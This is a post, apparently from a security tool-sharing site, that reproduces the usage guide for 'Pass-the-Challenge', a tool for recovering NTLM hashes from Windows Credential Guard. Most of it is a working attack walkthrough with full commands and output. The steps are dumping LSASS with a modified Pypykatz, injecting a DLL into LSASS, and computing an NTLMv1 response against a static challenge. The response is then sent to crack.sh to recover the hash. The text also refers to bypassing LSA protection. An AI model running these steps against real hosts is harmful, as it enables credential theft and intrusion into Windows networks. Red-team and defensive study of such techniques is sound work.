Recovering NTLM Hashes from Credential Guard
Author: Sec-Labs | Published:
Project
https://github.com/ly4k/PassTheChallenge
Pass-the-Challenge
Recover NTLM hashes from Credential Guard. Read more about the technique in the accompanying blog post.
Usage
Releases can be found on the project's GitHub page.
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)
Usage: <command> [<parameters...>]
Commands:
inject - Inject module and start PtC-RPC server inside LSASS
ping - Ping the PtC-RPC server inside LSASS
challenge - Calculate NTLMv2 Response using encrypted credentials
<addresses> - <context handle>:<proxy info>
<encrypted blob> - <HEX>
<server challenge> - <UTF16_HEX domain>:<UTF16_HEX username>:<HEX server name>:<HEX server challenge>
nthash - Calculate NTLMv1 Response using encrypted credentials
<addresses> - <context handle>:<proxy info>
<encrypted blob> - <HEX>
[<server challenge>] - If omitted, a static challenge of 1122334455667788 will be used
protect - Convert NT hash to encrypted blob
<addresses> - <context handle>:<proxy info>
<nt hash> - <HEX>
compare - Compare two encrypted blobs or an encrypted blob with a NT hash
<addresses> - <context handle>:<proxy info>
<encrypted blob> - <HEX>
<encrypted blob/NT hash> - <HEX>
Examples:
PtC.exe inject [<module>]
PtC.exe ping
PtC.exe challenge 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...] 6c0079[...]:610064[...]:020008[...]:66a98b[...]
PtC.exe nthash 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...]
PtC.exe protect 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...]
PtC.exe compare 0x1a34b[...]:0x7fff7[...] 0a92a82feb4[...] 66a98b[...]
Example
First, extract the encrypted credentials from an LSASS memory dump with the modified Pypykatz build. Besides the encrypted blob, it reports the context handle and proxy info that PtC needs as its <addresses> argument (written as <context handle>:<proxy info>).
> python3 -m pypykatz lsa minidump lsass.DMP -p msv
[...]
luid 194748
== MSV ==
Username: Administrator
Domain: corp
[LSA Isolated Data]
Is NT Present: True
Context Handle: 0x1b6d5216c60
Proxy Info: 0x7ffdd8bfd380
Encrypted blob: a0000000000000000800000064000000010000000101000001000000366f55058c45738be16ab11f1d78586f2649f0c348b3171496cd7ef39dd4f3bb3dfda4ea33fb46d407887a570b1d545d0100000000000000000000000000000001000000340000004e746c6d48617368256a784d729f032326c6f16b07ebbd279dab88912c12e9b7f8b16e3a5ccdce5f70b65eef248cf38faf856a9793cba54c7f8bf4ef
DPAPI: c02c86e371103ad7d7d352b19af1a74a00000000
[...]
Then inject the SecurityPackage.dll module into the LSASS process. Make sure SecurityPackage.dll is in your current working directory, or pass an alternative path as the first argument. Writing into LSASS requires local administrator (SYSTEM) rights on the host and is blocked by LSA protection (RunAsPPL) unless that is disabled or bypassed first, so check both before blaming the tool.
> .\PassTheChallenge.exe inject <[path to module]>
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)
[+] Package seems to be loaded
The simplest way to retrieve the NTLM hash is the nthash command, run with the values from the Pypykatz dump as shown below. Since no server challenge is given, the response is computed against the static challenge 1122334455667788.
> .\PassTheChallenge.exe nthash 0x1b6d5216c60:0x7ffdd8bfd380 a0000000000000000800000064000000010000000101000001000000366f55058c45738be16ab11f1d78586f2649f0c348b3171496cd7ef39dd4f3bb3dfda4ea33fb46d407887a570b1d545d0100000000000000000000000000000001000000340000004e746c6d48617368256a784d729f032326c6f16b07ebbd279dab88912c12e9b7f8b16e3a5ccdce5f70b65eef248cf38faf856a9793cba54c7f8bf4ef
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)
[+] Server is alive
[+] Response:
NTHASH:0F2FBBD336C44CB24E5189483F77378135F02C79D225B1AC
Finally, submit the NTHASH line to crack.sh, which is free for this case, and wait about 30 seconds for your NTLM hash. The lookup is that fast only because crack.sh's NTLMv1 tables are built for the challenge 1122334455667788 that PtC used; a response to any other challenge needs a full 56-bit DES key search.
See the blog post for more details.
Tags: tool sharing, NTLM